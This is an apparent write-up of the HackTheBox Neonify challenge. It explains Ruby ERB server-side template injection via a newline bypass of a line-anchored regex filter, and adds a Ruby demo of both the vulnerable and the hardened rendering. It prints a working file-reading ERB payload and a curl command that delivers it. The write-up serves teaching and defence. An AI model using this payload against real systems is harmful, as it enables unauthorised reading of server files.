We covered the Server-Side Template Injection (SSTI) vulnerability and demonstrated a practical scenario using the HackTheBox Neonify web challenge. SSTI is a server-side vulnerability in which user input is passed directly into the template engine as template source, rather than as data, so any template directives in the input are evaluated on the server. In the example we covered, the code used a regular expression filter to reject bad characters. Ruby's ^ and $ anchors match at line boundaries rather than at the ends of the whole string, so a filter built on them only checks one line: we put a harmless allowed character on the first line, followed by a newline, and placed a URL-encoded ERB payload after it to reveal the flag contents. This was part of HackTheBox Neonify.

CHALLENGE DESCRIPTION

It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this ERB SSTI payload to read and reveal sensitive files:
  • <%= File.open('flag.txt').read %>
  • The payload must be URL-encoded and placed after a line of allowed characters plus a newline (%0A), so that the line-anchored filter only sees the harmless first line.

An example request can be sent with curl using the command below to reveal the flag. The newline is sent as %0A, and the rest of the value is the URL-encoded form of <%= File.open('flag.txt').read %>:

curl -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' http://ip:port/
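To show the whole chain end to end, here is an added Ruby example; it is not the challenge's source code and not code from the page's author. It assumes a filter of the form /^[0-9a-z ]+$/i (the exact pattern used by the challenge is an assumption here) and uses a constructed flag file in a temp directory instead of the real flag.txt. It decodes the POST body shown above, shows that the line-anchored filter accepts the multi-line value while a \A...\z anchored filter rejects it, renders the value the vulnerable way (user text spliced into the ERB template source, so the directive executes) and the hardened way (fixed template, user text passed in as an escaped variable).

```ruby
# Added example, not the Neonify challenge's own code.
require "erb"
require "uri"
require "tempfile"

# Assumed filter pattern (the challenge's real regex is not shown on the page).
# In Ruby, ^ and $ match at the start/end of ANY line, so only one line of the
# input has to look clean for the match to succeed.
LINE_ANCHORED  = /^[0-9a-z ]+$/i
# \A and \z anchor to the start and very end of the whole string (\z, not \Z,
# which would still allow a trailing newline). The entire input must match.
WHOLE_ANCHORED = /\A[0-9a-z ]+\z/i

def weak_filter_passes?(text)
  LINE_ANCHORED.match?(text)
end

def strict_filter_passes?(text)
  WHOLE_ANCHORED.match?(text)
end

# Vulnerable pattern: user text becomes part of the template SOURCE, so any
# <%= ... %> inside it is evaluated by ERB on the server.
def render_unsafe(text)
  ERB.new("<h1 class=\"neon\">#{text}</h1>").result(binding)
end

# Hardened pattern: the template source is fixed; the user's text is passed in
# as a variable and HTML-escaped, so it can only ever be data.
def render_safe(text)
  template = ERB.new("<h1 class=\"neon\"><%= ERB::Util.html_escape(text) %></h1>")
  template.result(binding)
end

# Builds the same kind of body the curl command sends: an allowed character,
# a newline, then the ERB payload, all URL-encoded as form data.
def build_body(flag_path)
  payload = "a\n<%= File.open('#{flag_path}').read %>"
  URI.encode_www_form("neon" => payload)
end

# What the server sees after decoding the form body.
def decode_neon_param(body)
  URI.decode_www_form(body).to_h.fetch("neon")
end

# Runs the chain against a constructed flag file and returns the observations.
def demo_results
  flag = Tempfile.new("flag")
  flag.write("HTB{constructed_flag}")   # constructed sample, not a real flag
  flag.flush

  text = decode_neon_param(build_body(flag.path))
  {
    decoded_text: text,
    weak_filter_passes: weak_filter_passes?(text),
    strict_filter_passes: strict_filter_passes?(text),
    unsafe_output: render_unsafe(text),
    safe_output: render_safe(text),
  }
ensure
  flag&.close!
end

if __FILE__ == $0
  demo_results.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

The decoded value is "a\n<%= File.open('...').read %>": the first line satisfies the line-anchored regex, so the weak check passes, while the whole-string check fails on the newline. Rendering it unsafely returns the file contents inside the h1; the safe renderer returns the literal, escaped directive text and never reads the file. Fixing the anchors closes this particular bypass, but the durable fix is the second one: never let user input become template source.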

About the Author

Cybersecurity Trainer MS in Cybersecurity Expertise in Healthcare and Finance Industries Penetration tester and compliance auditor